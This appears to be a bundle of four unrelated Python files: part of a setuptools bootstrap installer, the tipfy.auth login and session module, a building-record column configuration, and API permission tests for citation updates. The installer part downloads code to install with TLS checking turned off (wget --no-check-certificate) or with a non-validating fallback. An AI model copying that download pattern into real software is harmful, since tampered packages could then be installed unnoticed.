"""
Download the file at url to target using Powershell (which will validate
trust). Raise an exception if the command cannot complete.
"""
target = os.path.abspath(target)
ps_cmd = (
"[System.Net.WebRequest]::DefaultWebProxy.Credentials = "
"[System.Net.CredentialCache]::DefaultCredentials; "
"(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)"
% vars()
)
cmd = [
'powershell',
'-Command',
ps_cmd,
]
_clean_check(cmd, target)
def has_powershell():
if platform.system() != 'Windows':
return False
cmd = ['powershell', '-Command', 'echo test']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
cmd = ['curl', url, '--silent', '--output', target]
_clean_check(cmd, target)
def has_curl():
cmd = ['curl', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_curl.viable = has_curl
def download_file_wget(url, target):
cmd = ['wget', url, '--quiet', '--no-check-certificate', '--output-document', target]
_clean_check(cmd, target)
def has_wget():
cmd = ['wget', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
"""
Use Python to download the file, even though it cannot authenticate the
connection.
"""
src = urlopen(url)
try:
# Read all the data in one block.
data = src.read()
finally:
src.close()
# Write all the data in one block to avoid creating a partial file.
with open(target, "wb") as dst:
dst.write(data)
download_file_insecure.viable = lambda: True
def get_best_downloader():
downloaders = (
download_file_powershell,
download_file_curl,
download_file_wget,
download_file_insecure,
)
viable_downloaders = (dl for dl in downloaders if dl.viable())
return next(viable_downloaders, None)
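# Usage sketch (hypothetical target path): the first viable downloader wins,
# so a typical Linux host resolves to curl or wget before falling back to the
# non-validating Python downloader:
#   downloader = get_best_downloader()
#   downloader(DEFAULT_URL + 'setuptools-5.7.zip', '/tmp/setuptools-5.7.zip')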
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, delay=15, downloader_factory=get_best_downloader):
"""
Download setuptools from a specified location and return its filename
`version` should be a valid setuptools version number that is available
as an sdist for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download
attempt.
``downloader_factory`` should be a function taking no arguments and
returning a function for downloading a URL to a target.
"""
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
zip_name = "setuptools-%s.zip" % version
url = download_base + zip_name
saveto = os.path.join(to_dir, zip_name)
if not os.path.exists(saveto): # Avoid repeated downloads
log.warn("Downloading %s", url)
downloader = downloader_factory()
downloader(url, saveto)
return os.path.realpath(saveto)
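# A minimal usage sketch of the download helpers above (values are
# illustrative; assumes network access and the DEFAULT_VERSION/DEFAULT_URL
# constants defined earlier in this script):
#
#   downloader = get_best_downloader()   # e.g. download_file_curl, if viable
#   archive = download_setuptools(version=DEFAULT_VERSION, to_dir='/tmp',
#                                 downloader_factory=get_best_downloader)
#   # 'archive' is the absolute path of the downloaded setuptools sdist zip.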
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the setuptools package
"""
return ['--user'] if options.user_install else []
def _parse_args():
"""
Parse the command line for options
"""
parser = optparse.OptionParser()
parser.add_option(
'--user', dest='user_install', action='store_true', default=False,
help='install in user site package (requires Python 2.6 or later)')
parser.add_option(
'--download-base', dest='download_base', metavar="URL",
default=DEFAULT_URL,
help='alternative URL from where to download the setuptools package')
parser.add_option(
'--insecure', dest='downloader_factory', action='store_const',
const=lambda: download_file_insecure, default=get_best_downloader,
help='Use internal, non-validating downloader'
)
parser.add_option(
'--version', help="Specify which version to download",
default=DEFAULT_VERSION,
)
options, args = parser.parse_args()
# positional arguments are ignored
return options
def main():
"""Install or upgrade setuptools and EasyInstall"""
options = _parse_args()
archive = download_setuptools(
version=options.version,
download_base=options.download_base,
downloader_factory=options.downloader_factory,
)
return _install(archive, _build_install_args(options))
if __name__ == '__main__':
sys.exit(main())
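# Typical invocations of this bootstrap script, per the options defined in
# _parse_args above (the version number shown is illustrative):
#
#   python ez_setup.py                  # install the default version
#   python ez_setup.py --user           # install into the user site-packages
#   python ez_setup.py --insecure       # use the non-validating downloader
#   python ez_setup.py --version 1.4.2  # request a specific version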
|
|
# -*- coding: utf-8 -*-
"""
tipfy.auth
~~~~~~~~~~
Base classes for user authentication.
:copyright: 2011 by tipfy.org.
:license: BSD, see LICENSE.txt for more details.
"""
from __future__ import absolute_import
import uuid
from werkzeug import abort
from tipfy import DEV_APPSERVER
from werkzeug import (cached_property, check_password_hash,
generate_password_hash, import_string)
#: Default configuration values for this module. Keys are:
#:
#: user_model
#: A ``db.Model`` class used for authenticated users, as a string.
#: Default is `tipfy.appengine.auth.model.User`.
#:
#: secure_urls
#: True to use secure URLs for login, logout and sign up, False otherwise.
#: Default is False.
#:
#: cookie_name
#: Name of the authentication cookie. Default is `session`, which stores
#: the data in the default session.
#:
#: session_max_age
#: Interval in seconds before a user session id is renewed.
#: Default is 1 week.
default_config = {
'user_model': 'tipfy.appengine.auth.model.User',
'cookie_name': 'session',
'secure_urls': False,
'session_max_age': 86400 * 7,
}
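# A sketch of overriding these defaults, assuming the usual tipfy pattern of
# passing a config dict keyed by module name when constructing the app (the
# values shown are illustrative):
#
#   app = Tipfy(rules=rules, config={
#       'tipfy.auth': {
#           'cookie_name': 'auth',
#           'session_max_age': 86400,  # renew session ids daily
#       },
#   })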
class BaseAuthStore(object):
def __init__(self, request):
self.request = request
self.app = request.app
self.config = request.app.config[__name__]
@cached_property
def user_model(self):
"""Returns the configured user model.
:returns:
A :class:`tipfy.auth.model.User` class.
"""
registry = self.app.registry
key = 'auth.user_model'
if key not in registry:
registry[key] = import_string(self.config['user_model'])
return registry[key]
@cached_property
def _session_base(self):
cookie_name = self.config['cookie_name']
return self.request.session_store.get_session(cookie_name)
def _url(self, _name, **kwargs):
kwargs.setdefault('redirect', self.request.path)
if not DEV_APPSERVER and self.config['secure_urls']:
kwargs['_scheme'] = 'https'
return self.app.router.url_for(self.request, _name, kwargs)
def login_url(self, **kwargs):
"""Returns a URL that, when visited, prompts the user to sign in.
:returns:
A URL to perform login.
"""
return self._url('auth/login', **kwargs)
def logout_url(self, **kwargs):
"""Returns a URL that, when visited, logs out the user.
:returns:
A URL to perform logout.
"""
return self._url('auth/logout', **kwargs)
def signup_url(self, **kwargs):
"""Returns a URL that, when visited, prompts the user to sign up.
:returns:
A URL to perform signup.
"""
return self._url('auth/signup', **kwargs)
def create_user(self, username, auth_id, **kwargs):
"""Creates a new user entity.
:param username:
Unique username.
:param auth_id:
Unique authentication id. For App Engine users it is 'gae:user_id'.
:returns:
The new entity if the username is available, None otherwise.
"""
return self.user_model.create(username, auth_id, **kwargs)
def get_user_entity(self, username=None, auth_id=None):
"""Loads an user entity from datastore. Override this to implement
a different loading method. This method will load the user depending
on the way the user is being authenticated: for form authentication,
username is used; for third party or App Engine authentication,
auth_id is used.
:param username:
Unique username.
:param auth_id:
Unique authentication id.
:returns:
A ``User`` model instance, or None.
"""
if auth_id:
return self.user_model.get_by_auth_id(auth_id)
elif username:
return self.user_model.get_by_username(username)
@property
def session(self):
"""The auth session. For third party auth, it is possible that an
auth session exists but :attr:`user` is None (the user wasn't created
yet). We access the session to check if the user is logged in but
doesn't have an account.
"""
raise NotImplementedError()
@property
def user(self):
"""The user entity."""
raise NotImplementedError()
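# A hedged sketch of customizing user loading by overriding get_user_entity(),
# as its docstring suggests. EmailAuthStore and get_by_email are hypothetical
# names used only for illustration, not part of tipfy:
#
#   class EmailAuthStore(BaseAuthStore):
#       def get_user_entity(self, username=None, auth_id=None):
#           if username and '@' in username:
#               return self.user_model.get_by_email(username)
#           return super(EmailAuthStore, self).get_user_entity(
#               username=username, auth_id=auth_id)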
class SessionAuthStore(BaseAuthStore):
"""Base store for auth stores that use own session."""
def __init__(self, *args, **kwargs):
super(SessionAuthStore, self).__init__(*args, **kwargs)
self.loaded = False
self._session = self._user = None
@property
def session(self):
"""Returns the currently logged in user session."""
if not self.loaded:
self._load_session_and_user()
return self._session
@property
def user(self):
"""Returns the currently logged in user entity or None.
:returns:
A :class:`User` entity, if the user for the current request is
logged in, or None.
"""
if not self.loaded:
self._load_session_and_user()
return self._user
def create_user(self, username, auth_id, **kwargs):
user = super(SessionAuthStore, self).create_user(username,
auth_id, **kwargs)
if user:
self._set_session(auth_id, user)
return user
def logout(self):
"""Logs out the current user. This deletes the authentication session.
"""
self.loaded = True
self._session_base.pop('_auth', None)
self._session = self._user = None
def _load_session_and_user(self):
raise NotImplementedError()
def _set_session(self, auth_id, user=None, remember=False):
kwargs = {}
session = {'id': auth_id}
if user:
session['token'] = user.session_id
if remember:
kwargs['max_age'] = self.config['session_max_age']
else:
kwargs['max_age'] = None
self._session_base['_auth'] = self._session = session
self.request.session_store.update_session_args(
self.config['cookie_name'], **kwargs)
class MultiAuthStore(SessionAuthStore):
"""Store used for custom or third party authentication."""
def login_with_form(self, username, password, remember=False):
"""Authenticates the current user using data from a form.
:param username:
Username.
:param password:
Password.
:param remember:
True if authentication should be persisted even if user leaves the
current session (the "remember me" feature).
:returns:
            True if login was successful, False otherwise.
"""
self.loaded = True
user = self.get_user_entity(username=username)
if user is not None and user.check_password(password):
# Successful login. Check if session id needs renewal.
user.renew_session(max_age=self.config['session_max_age'])
# Make the user available.
self._user = user
# Store the cookie.
self._set_session(user.auth_id, user, remember)
return True
# Authentication failed.
return False
def login_with_auth_id(self, auth_id, remember=False, **kwargs):
"""Called to authenticate the user after a third party confirmed
authentication.
:param auth_id:
Authentication id, generally a combination of service name and
user identifier for the service, e.g.: 'twitter|john'.
:param remember:
True if authentication should be persisted even if user leaves the
current session (the "remember me" feature).
:returns:
None. This always authenticates the user.
"""
self.loaded = True
self._user = self.get_user_entity(auth_id=auth_id)
if self._user:
# Set current user from datastore.
self._set_session(auth_id, self._user, remember)
else:
# Simply set a session; user will be created later if required.
self._set_session(auth_id, remember=remember)
def _load_session_and_user(self):
self.loaded = True
session = self._session_base.get('_auth', {})
auth_id = session.get('id')
session_token = session.get('token')
if auth_id is None or session_token is None:
# No session, no user.
return
self._session = session
# Fetch the user entity.
user = self.get_user_entity(auth_id=auth_id)
if user is None:
            # No user found for this auth id; the user must log in again.
return
current_token = user.session_id
if not user.check_session(session_token):
# Token didn't match.
return self.logout()
# Successful login. Check if session id needs renewal.
user.renew_session(max_age=self.config['session_max_age'])
if (current_token != user.session_id) or user.auth_remember:
# Token was updated or we need to renew session per request.
self._set_session(auth_id, user, user.auth_remember)
self._user = user
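# A minimal login-handler sketch driving MultiAuthStore through a handler's
# `auth` store. LoginHandler and the form field names are illustrative, not
# part of this module:
#
#   class LoginHandler(RequestHandler):
#       def post(self, **kwargs):
#           username = self.request.form.get('username')
#           password = self.request.form.get('password')
#           remember = bool(self.request.form.get('remember'))
#           if self.auth.login_with_form(username, password, remember):
#               return self.redirect(self.request.args.get('redirect', '/'))
#           return 'Login failed.'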
class LoginRequiredMiddleware(object):
"""A RequestHandler middleware to require user authentication. This
acts as a `login_required` decorator but for handler classes. Example::
from tipfy import RequestHandler
from tipfy.auth import LoginRequiredMiddleware
class MyHandler(RequestHandler):
middleware = [LoginRequiredMiddleware]
def get(self, **kwargs):
return 'Only logged in users can see this.'
"""
def before_dispatch(self, handler):
return _login_required(handler)
class UserRequiredMiddleware(object):
"""A RequestHandler middleware to require the current user to have an
account saved in datastore. This acts as a `user_required` decorator but
for handler classes. Example::
from tipfy import RequestHandler
from tipfy.auth import UserRequiredMiddleware
class MyHandler(RequestHandler):
middleware = [UserRequiredMiddleware]
def get(self, **kwargs):
return 'Only users can see this.'
"""
def before_dispatch(self, handler):
return _user_required(handler)
class UserRequiredIfAuthenticatedMiddleware(object):
"""A RequestHandler middleware to require the current user to have an
account saved in datastore, but only if he is logged in. This acts as a
`user_required_if_authenticated` decorator but for handler classes.
Example::
from tipfy import RequestHandler
from tipfy.auth import UserRequiredIfAuthenticatedMiddleware
class MyHandler(RequestHandler):
middleware = [UserRequiredIfAuthenticatedMiddleware]
def get(self, **kwargs):
            return ('Only non-logged in users or users with saved '
                    'accounts can see this.')
"""
def before_dispatch(self, handler):
return _user_required_if_authenticated(handler)
class AdminRequiredMiddleware(object):
"""A RequestHandler middleware to require the current user to be admin.
    This acts as an `admin_required` decorator but for handler classes.
Example::
from tipfy import RequestHandler
from tipfy.auth import AdminRequiredMiddleware
class MyHandler(RequestHandler):
middleware = [AdminRequiredMiddleware]
def get(self, **kwargs):
return 'Only admins can see this.'
"""
def before_dispatch(self, handler):
return _admin_required(handler)
def login_required(func):
"""A RequestHandler method decorator to require user authentication.
Normally :func:`user_required` is used instead. Example::
from tipfy import RequestHandler
from tipfy.auth import login_required
class MyHandler(RequestHandler):
@login_required
def get(self, **kwargs):
return 'Only logged in users can see this.'
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _login_required(self) or func(self, *args, **kwargs)
return decorated
def user_required(func):
"""A RequestHandler method decorator to require the current user to
have an account saved in datastore. Example::
from tipfy import RequestHandler
from tipfy.auth import user_required
class MyHandler(RequestHandler):
@user_required
def get(self, **kwargs):
return 'Only users can see this.'
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _user_required(self) or func(self, *args, **kwargs)
return decorated
def user_required_if_authenticated(func):
"""A RequestHandler method decorator to require the current user to
have an account saved in datastore, but only if he is logged in. Example::
from tipfy import RequestHandler
from tipfy.auth import user_required_if_authenticated
class MyHandler(RequestHandler):
@user_required_if_authenticated
def get(self, **kwargs):
            return ('Only non-logged in users or users with saved '
                    'accounts can see this.')
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _user_required_if_authenticated(self) or \
func(self, *args, **kwargs)
return decorated
def admin_required(func):
"""A RequestHandler method decorator to require the current user to be
admin. Example::
from tipfy import RequestHandler
from tipfy.auth import admin_required
class MyHandler(RequestHandler):
@admin_required
def get(self, **kwargs):
return 'Only admins can see this.'
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _admin_required(self) or func(self, *args, **kwargs)
return decorated
def create_session_id():
return uuid.uuid4().hex
def _login_required(handler):
"""Implementation for login_required and LoginRequiredMiddleware."""
auth = handler.auth
if not auth.session:
return handler.redirect(auth.login_url())
def _user_required(handler):
"""Implementation for user_required and UserRequiredMiddleware."""
auth = handler.auth
if not auth.session:
return handler.redirect(auth.login_url())
if not auth.user:
return handler.redirect(auth.signup_url())
def _user_required_if_authenticated(handler):
"""Implementation for user_required_if_authenticated and
UserRequiredIfAuthenticatedMiddleware.
"""
auth = handler.auth
if auth.session and not auth.user:
return handler.redirect(auth.signup_url())
def _admin_required(handler):
"""Implementation for admin_required and AdminRequiredMiddleware."""
auth = handler.auth
if not auth.session:
return handler.redirect(auth.login_url())
if not auth.user or not auth.user.is_admin:
abort(403)
|
|
EXCLUDE_FIELDS = [
'best_guess_canonical_building',
'best_guess_confidence',
'canonical_building',
'canonical_for_ds',
'children',
'confidence',
'created',
'extra_data',
'id',
'import_file',
'last_modified_by',
'match_type',
'modified',
'parents',
'pk',
'seed_org',
'source_type',
'super_organization',
]
META_FIELDS = [
'best_guess_canonical_building',
'best_guess_confidence',
'canonical_for_ds',
'confidence',
'match_type',
'source_type',
]
ASSESSOR_FIELDS = [
{
"title": "PM Property ID",
"sort_column": "pm_property_id",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False,
"static": False,
"link": True
},
{
"title": "Tax Lot ID",
"sort_column": "tax_lot_id",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False,
"static": False,
"link": True
},
{
"title": "Custom ID 1",
"sort_column": "custom_id_1",
"class": "is_aligned_right whitespace",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False,
"static": False,
"link": True
},
{
"title": "Property Name",
"sort_column": "property_name",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Address Line 1",
"sort_column": "address_line_1",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Address Line 2",
"sort_column": "address_line_2",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "County/District/Ward/Borough",
"sort_column": "district",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Lot Number",
"sort_column": "lot_number",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Block Number",
"sort_column": "block_number",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "City",
"sort_column": "city",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "State Province",
"sort_column": "state_province",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Postal Code",
"sort_column": "postal_code",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Year Built",
"sort_column": "year_built",
"class": "is_aligned_right",
"title_class": "",
"type": "number",
"min": "year_built__gte",
"max": "year_built__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Use Description",
"sort_column": "use_description",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Building Count",
"sort_column": "building_count",
"class": "is_aligned_right",
"title_class": "",
"type": "number",
"min": "building_count__gte",
"max": "building_count__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Property Notes",
"sort_column": "property_notes",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Recent Sale Date",
"sort_column": "recent_sale_date",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "recent_sale_date__gte",
"max": "recent_sale_date__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Owner",
"sort_column": "owner",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Address",
"sort_column": "owner_address",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner City",
"sort_column": "owner_city_state",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Postal Code",
"sort_column": "owner_postal_code",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Email",
"sort_column": "owner_email",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Telephone",
"sort_column": "owner_telephone",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Gross Floor Area",
"sort_column": "gross_floor_area",
"subtitle": u"ft" + u"\u00B2",
"class": "is_aligned_right",
"type": "floor_area",
"min": "gross_floor_area__gte",
"max": "gross_floor_area__lte",
"field_type": "assessor",
"checked": False
},
{
"title": "Energy Star Score",
"sort_column": "energy_score",
"class": "is_aligned_right",
"type": "number",
"min": "energy_score__gte",
"max": "energy_score__lte",
"field_type": "pm",
"checked": False
},
{
"title": "Site EUI",
"sort_column": "site_eui",
"class": "is_aligned_right",
"type": "number",
"min": "site_eui__gte",
"max": "site_eui__lte",
"field_type": "pm",
"checked": False
},
{
"title": "Generation Date",
"sort_column": "generation_date",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "generation_date__gte",
"max": "generation_date__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Release Date",
"sort_column": "release_date",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "release_date__gte",
"max": "release_date__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Year Ending",
"sort_column": "year_ending",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "year_ending__gte",
"max": "year_ending__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Creation Date",
"sort_column": "created",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "created__gte",
"max": "created__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Modified Date",
"sort_column": "modified",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "modified__gte",
"max": "modified__lte",
"field_type": "building_information",
"checked": False
}
]
ASSESSOR_FIELDS_BY_COLUMN = {field['sort_column']: field
for field in ASSESSOR_FIELDS}
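# A small usage sketch for the lookup table above (the year values are
# illustrative; the min/max keys map directly to ORM-style range filters):
#
#   field = ASSESSOR_FIELDS_BY_COLUMN['year_built']
#   filters = {field['min']: 1950, field['max']: 2000}
#   # -> {'year_built__gte': 1950, 'year_built__lte': 2000}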
|
|
from nose.tools import * # flake8: noqa
from website.util import permissions
from api.base.settings.defaults import API_BASE
from api.citations import utils as citation_utils
from tests.base import ApiTestCase
from osf_tests.factories import (
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
AlternativeCitationFactory
)
def payload(name=None, text=None, _id=None):
    data = {
        'data': {
            'type': 'citations',
            'attributes': {}
        }
    }
if name is not None:
data['data']['attributes']['name'] = name
if text is not None:
data['data']['attributes']['text'] = text
if _id is not None:
data['data']['id'] = _id
return data
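# For reference, payload(name='n', text='t', _id='abc123') builds the JSON API
# document the tests below send:
#
#   {'data': {'type': 'citations',
#             'attributes': {'name': 'n', 'text': 't'},
#             'id': 'abc123'}}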
def set_up_citation_and_project(admin, public=True, registration=False, contrib=None, citation2=False, for_delete=False, bad=False):
project = ProjectFactory(creator=admin, is_public=public)
citation = AlternativeCitationFactory(name='name', text='text')
project.alternative_citations.add(citation)
if contrib:
project.add_contributor(contrib, permissions=[permissions.READ, permissions.WRITE], visible=True)
if citation2:
citation2 = AlternativeCitationFactory(name='name2', text='text2')
project.alternative_citations.add(citation2)
project.save()
slug = 1 if bad else citation._id
if registration:
project = RegistrationFactory(project=project, is_public=public)
citation_url = '/{}registrations/{}/citations/{}/'.format(API_BASE, project._id, slug)
else:
citation_url = '/{}nodes/{}/citations/{}/'.format(API_BASE, project._id, slug)
if for_delete:
return project, citation_url
return citation, citation_url
class TestUpdateAlternativeCitations(ApiTestCase):
def request(self, is_admin=False, is_contrib=True, logged_out=False, errors=False, patch=False, **kwargs):
name = kwargs.pop('name', None)
text = kwargs.pop('text', None)
admin = AuthUserFactory()
        if is_admin:
            user = admin
        elif not logged_out:
            user = AuthUserFactory()
            kwargs['contrib'] = user if is_contrib else None
citation, citation_url = set_up_citation_and_project(admin, **kwargs)
data = payload(name=name, text=text, _id=citation._id)
if patch:
if not logged_out:
res = self.app.patch_json_api(citation_url, data, auth=user.auth, expect_errors=errors)
else:
res = self.app.patch_json_api(citation_url, data, expect_errors=errors)
else:
if not logged_out:
res = self.app.put_json_api(citation_url, data, auth=user.auth, expect_errors=errors)
else:
res = self.app.put_json_api(citation_url, data, expect_errors=errors)
return res, citation
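    # Example of how the test matrix below drives this helper; extra kwargs
    # (public, registration, citation2, ...) pass through to
    # set_up_citation_and_project:
    #
    #   res, citation = self.request(name='Test', text='text',
    #                                public=False, is_admin=True)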
def test_update_citation_name_admin_public(self):
res, citation = self.request(name="Test",
text="text",
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'Test')
citation.reload()
assert_equal(citation.name, "Test")
def test_update_citation_name_admin_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'Test')
citation.reload()
assert_equal(citation.name, "Test")
def test_update_citation_name_non_admin_public(self):
res, citation = self.request(name="Test",
text="text",
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_non_admin_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_non_contrib_public(self):
res, citation = self.request(name="Test",
text="text",
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_non_contrib_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_logged_out_public(self):
res, citation = self.request(name="Test",
text="text",
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_logged_out_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_text_admin_public(self):
res, citation = self.request(name="name",
text="Test",
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['text'], 'Test')
citation.reload()
assert_equal(citation.text, "Test")
def test_update_citation_text_admin_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['text'], 'Test')
citation.reload()
assert_equal(citation.text, "Test")
def test_update_citation_text_non_admin_public(self):
res, citation = self.request(name="name",
text="Test",
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_non_admin_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_non_contrib_public(self):
res, citation = self.request(name="name",
text="Test",
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_non_contrib_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_logged_out_public(self):
res, citation = self.request(name="name",
text="Test",
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_logged_out_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_admin_public(self):
res, citation = self.request(name="Test",
text="Test",
is_admin=True)
assert_equal(res.status_code, 200)
        assert_equal(res.json['data']['attributes']['name'], 'Test')
        assert_equal(res.json['data']['attributes']['text'], 'Test')
        citation.reload()
        assert_equal(citation.name, "Test")
        assert_equal(citation.text, "Test")
def test_update_citation_admin_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
is_admin=True)
assert_equal(res.status_code, 200)
        assert_equal(res.json['data']['attributes']['name'], 'Test')
        assert_equal(res.json['data']['attributes']['text'], 'Test')
        citation.reload()
        assert_equal(citation.name, "Test")
        assert_equal(citation.text, "Test")
def test_update_citation_non_admin_public(self):
res, citation = self.request(name="Test",
text="Test",
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_admin_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_public(self):
res, citation = self.request(name="Test",
text="Test",
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_public(self):
res, citation = self.request(name="Test",
text="Test",
